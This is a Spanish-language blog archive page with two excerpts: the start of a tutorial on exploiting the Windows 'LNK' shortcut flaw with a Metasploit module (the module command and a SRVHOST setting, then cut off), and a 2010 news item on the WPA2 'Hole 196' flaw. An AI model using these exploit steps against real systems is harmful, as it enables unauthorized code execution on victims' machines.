Entradas

Mostrando entradas de julio 27, 2010

Explotando "LNK" con Metasploit - Método 2

[*] - Explotando "LNK" con MetaSploit - Método 1
[*] - Explotando "LNK" con MetaSploit - Método 2

Ahora vamos a citar otro método para explotar la vulnerabilidad "LNK" de Microsoft Windows XP.

Tendremos que actualizar Metasploit y lo que haremos será:
msf > use windows/browser/ms10_xxx_windows_shell_lnk_execute

Especificamos el exploit:
msf exploit(ms10_xxx_windows_shell_lnk_execute) > set SRVHOST 192.168.78.133
SRVHOST => 192.168.78.133

Descubierto fallo de seguridad en el protocolo WiFi WPA2

Imagen
Investigadores en seguridad de la compañía AitTight Networks han descubierto una vulnerabilidad en el protocolo de cifrado y autentificación inalámbrica más seguro hasta la fecha, el WPA2.

Bautizado como "Hole 196", permite a un usuario que esté autentificado en la red, descifrar toda la información que transmitan los demás usuarios de la red, además de permitir inyectar código malicioso y comprometer el resto de los dispositivos autorizados. La herramienta para explotar la vulnerabilidad se denomina MadWiFi y al ser un proyecto de código abierto, está disponible para todo el mundo.

Por el momento no hay ningún parche o forma de protegerse contra ese agujero de seguridad, así lo afirma Kaustubh Phanse, investigador de AirTight, lo que lo convierte en una vulnerabilidad "Zero Day".